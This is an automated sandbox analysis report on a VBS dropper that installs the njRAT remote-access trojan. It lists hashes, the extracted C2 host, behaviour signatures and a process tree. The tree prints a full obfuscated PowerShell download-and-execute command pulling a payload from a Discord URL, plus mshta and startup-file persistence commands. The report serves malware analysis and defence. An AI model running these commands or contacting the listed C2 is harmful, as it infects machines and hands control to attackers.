e147c36f7e37e928c129b2337c90bda770f4cd437899932c723fd9d5392859ed.vbs

General
Target

e147c36f7e37e928c129b2337c90bda770f4cd437899932c723fd9d5392859ed.vbs

Filesize

828B

Completed

15-09-2021 08:32

Score
10/10
MD5

9af0d5fbc14e3ac0ae409dfef6e04228

SHA1

931b3139830e5485f198bb72ecba50475e4c8df2

SHA256

e147c36f7e37e928c129b2337c90bda770f4cd437899932c723fd9d5392859ed

Malware Config

Extracted

Family njrat
Version 0.7NC
Botnet NYAN CAT
C2

envirat.duckdns.org:3013

Attributes
reg_key
6de17d5355fa43eca7e
splitter
@!#&^%$
Signatures 9

Filter: none

Discovery
  • njRAT/Bladabindi

    Description

    Widely used RAT written in .NET.

  • Blocklisted process makes network request
    powershell.exe

    Reported IOCs

    flowpidprocess
    3524powershell.exe
  • Drops startup file
    powershell.exe

    Reported IOCs

    descriptioniocprocess
    File createdC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.vbspowershell.exe
  • Suspicious use of SetThreadContext
    powershell.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 3924 set thread context of 28283924powershell.exeaspnet_compiler.exe
  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Modifies registry class
    powershell.exe

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settingspowershell.exe
  • Suspicious behavior: EnumeratesProcesses
    powershell.exepowershell.exe

    Reported IOCs

    pidprocess
    524powershell.exe
    524powershell.exe
    524powershell.exe
    3924powershell.exe
    3924powershell.exe
    3924powershell.exe
  • Suspicious use of AdjustPrivilegeToken
    powershell.exepowershell.exeaspnet_compiler.exe

    Reported IOCs

    descriptionpidprocess
    Token: SeDebugPrivilege524powershell.exe
    Token: SeDebugPrivilege3924powershell.exe
    Token: SeDebugPrivilege2828aspnet_compiler.exe
    Token: 332828aspnet_compiler.exe
    Token: SeIncBasePriorityPrivilege2828aspnet_compiler.exe
    Token: 332828aspnet_compiler.exe
    Token: SeIncBasePriorityPrivilege2828aspnet_compiler.exe
    Token: 332828aspnet_compiler.exe
    Token: SeIncBasePriorityPrivilege2828aspnet_compiler.exe
    Token: 332828aspnet_compiler.exe
    Token: SeIncBasePriorityPrivilege2828aspnet_compiler.exe
    Token: 332828aspnet_compiler.exe
    Token: SeIncBasePriorityPrivilege2828aspnet_compiler.exe
    Token: 332828aspnet_compiler.exe
    Token: SeIncBasePriorityPrivilege2828aspnet_compiler.exe
    Token: 332828aspnet_compiler.exe
    Token: SeIncBasePriorityPrivilege2828aspnet_compiler.exe
    Token: 332828aspnet_compiler.exe
    Token: SeIncBasePriorityPrivilege2828aspnet_compiler.exe
    Token: 332828aspnet_compiler.exe
    Token: SeIncBasePriorityPrivilege2828aspnet_compiler.exe
    Token: 332828aspnet_compiler.exe
    Token: SeIncBasePriorityPrivilege2828aspnet_compiler.exe
    Token: 332828aspnet_compiler.exe
    Token: SeIncBasePriorityPrivilege2828aspnet_compiler.exe
    Token: 332828aspnet_compiler.exe
    Token: SeIncBasePriorityPrivilege2828aspnet_compiler.exe
    Token: 332828aspnet_compiler.exe
    Token: SeIncBasePriorityPrivilege2828aspnet_compiler.exe
    Token: 332828aspnet_compiler.exe
    Token: SeIncBasePriorityPrivilege2828aspnet_compiler.exe
    Token: 332828aspnet_compiler.exe
    Token: SeIncBasePriorityPrivilege2828aspnet_compiler.exe
    Token: 332828aspnet_compiler.exe
    Token: SeIncBasePriorityPrivilege2828aspnet_compiler.exe
  • Suspicious use of WriteProcessMemory
    WScript.exepowershell.exeWScript.execmd.exemshta.exepowershell.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 4000 wrote to memory of 5244000WScript.exepowershell.exe
    PID 4000 wrote to memory of 5244000WScript.exepowershell.exe
    PID 524 wrote to memory of 1956524powershell.exeWScript.exe
    PID 524 wrote to memory of 1956524powershell.exeWScript.exe
    PID 1956 wrote to memory of 40761956WScript.execmd.exe
    PID 1956 wrote to memory of 40761956WScript.execmd.exe
    PID 4076 wrote to memory of 28324076cmd.exemshta.exe
    PID 4076 wrote to memory of 28324076cmd.exemshta.exe
    PID 2832 wrote to memory of 39242832mshta.exepowershell.exe
    PID 2832 wrote to memory of 39242832mshta.exepowershell.exe
    PID 3924 wrote to memory of 28283924powershell.exeaspnet_compiler.exe
    PID 3924 wrote to memory of 28283924powershell.exeaspnet_compiler.exe
    PID 3924 wrote to memory of 28283924powershell.exeaspnet_compiler.exe
    PID 3924 wrote to memory of 28283924powershell.exeaspnet_compiler.exe
    PID 3924 wrote to memory of 28283924powershell.exeaspnet_compiler.exe
    PID 3924 wrote to memory of 28283924powershell.exeaspnet_compiler.exe
    PID 3924 wrote to memory of 28283924powershell.exeaspnet_compiler.exe
    PID 3924 wrote to memory of 28283924powershell.exeaspnet_compiler.exe
Processes 7
  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e147c36f7e37e928c129b2337c90bda770f4cd437899932c723fd9d5392859ed.vbs"
    Suspicious use of WriteProcessMemory
    PID:4000
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExEcUtIoNPoLiCy ByPAsS -wInDoWStYlE hIdDEn -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://cdn.discordapp.com/attachments/876945743724822550/877222584595402823/Fucking.txt');$results
      Blocklisted process makes network request
      Drops startup file
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:524
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBS"
        Suspicious use of WriteProcessMemory
        PID:1956
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\SystemLogin.bat" "
          Suspicious use of WriteProcessMemory
          PID:4076
          • C:\Windows\system32\mshta.exe
            mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'"", 0:close")
            Suspicious use of WriteProcessMemory
            PID:2832
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'
              Suspicious use of SetThreadContext
              Suspicious behavior: EnumeratesProcesses
              Suspicious use of AdjustPrivilegeToken
              Suspicious use of WriteProcessMemory
              PID:3924
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                Suspicious use of AdjustPrivilegeToken
                PID:2828
Network
MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Defense Evasion
          Execution
            Exfiltration
              Impact
                Initial Access
                  Lateral Movement
                    Persistence
                      Privilege Escalation
                        Replay Monitor
                        00:00 00:00
                        Downloads
                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBS

                          MD5

                          558a8b7b3fdef4ca79110f8cfd126694

                          SHA1

                          d6e96ca27f701b3f4c24885dacd14c762a9d36b0

                          SHA256

                          38c9b7098371b39e61a6dcf78370dddf47f4d2be2c32704a2a0310b76c52c0f7

                          SHA512

                          37d6d72d5f518aaf1cf37154ed75aec7c7f11677508874eb3c3cbf44ca0ebeb22112dfa5f45a2f5d821604c521092ef768016d83f948444a9ff2e2a812d1c283

                        • C:\Users\Admin\AppData\Roaming\SystemLogin.bat

                          MD5

                          7f85382953fde20b101039d48673dbd2

                          SHA1

                          5ebaa67f5862b2925d9029f4761b7e2ce9a99dd9

                          SHA256

                          fde417ad1b13a97acfa8e409789a92c4c3ddf6303851337ca31b94bfac634e4f

                          SHA512

                          6e93b74237844e1f78cd3ae64c0a00702c0b1aa1febda2feb52ca99b8a58ab2efd0c7b8351f040bf56a8bc1a8f5b1f57c4a9ffed46f8a2f9cba898e8e138ce46

                        • C:\Users\Public\myScript.ps1

                          MD5

                          317f5c7ef5b887966f963c21a60e2889

                          SHA1

                          5078bdb3e7376202c7253a8b428a360e1c047863

                          SHA256

                          cd7143c00ef7711ccdcc6877d6d393e4f6e2bb2aef26bf2214b81e660f7c7cdd

                          SHA512

                          e4d6590082671997ef08550d48b5ff43dd63a1811c4b883bbe75a9a5e22087b5928be43e624632bdaf8c01d4334ae397c672d1695900d1bd25e7a27a03b10750

                        • memory/524-115-0x0000000000000000-mapping.dmp

                        • memory/524-121-0x000001ED28FA0000-0x000001ED28FA1000-memory.dmp

                        • memory/524-124-0x000001ED28600000-0x000001ED28602000-memory.dmp

                        • memory/524-159-0x000001ED28606000-0x000001ED28608000-memory.dmp

                        • memory/524-160-0x000001ED29220000-0x000001ED29222000-memory.dmp

                        • memory/524-126-0x000001ED28603000-0x000001ED28605000-memory.dmp

                        • memory/524-142-0x000001ED29250000-0x000001ED29251000-memory.dmp

                        • memory/524-153-0x000001ED29310000-0x000001ED29311000-memory.dmp

                        • memory/1956-177-0x0000000000000000-mapping.dmp

                        • memory/2828-211-0x000000000040677E-mapping.dmp

                        • memory/2828-218-0x00000000052A0000-0x00000000052A1000-memory.dmp

                        • memory/2828-219-0x0000000005150000-0x000000000564E000-memory.dmp

                        • memory/2828-217-0x0000000005650000-0x0000000005651000-memory.dmp

                        • memory/2828-220-0x0000000005230000-0x0000000005231000-memory.dmp

                        • memory/2828-216-0x00000000050B0000-0x00000000050B1000-memory.dmp

                        • memory/2828-210-0x0000000000400000-0x000000000040C000-memory.dmp

                        • memory/2828-221-0x00000000054C0000-0x00000000054C1000-memory.dmp

                        • memory/2832-181-0x0000000000000000-mapping.dmp

                        • memory/3924-208-0x000001F730CC6000-0x000001F730CC8000-memory.dmp

                        • memory/3924-207-0x000001F74B5C0000-0x000001F74B5C5000-memory.dmp

                        • memory/3924-202-0x000001F74B5B0000-0x000001F74B5B2000-memory.dmp

                        • memory/3924-194-0x000001F730CC0000-0x000001F730CC2000-memory.dmp

                        • memory/3924-184-0x0000000000000000-mapping.dmp

                        • memory/3924-209-0x000001F74B5D0000-0x000001F74B5D3000-memory.dmp

                        • memory/3924-195-0x000001F730CC3000-0x000001F730CC5000-memory.dmp

                        • memory/4076-180-0x0000000000000000-mapping.dmp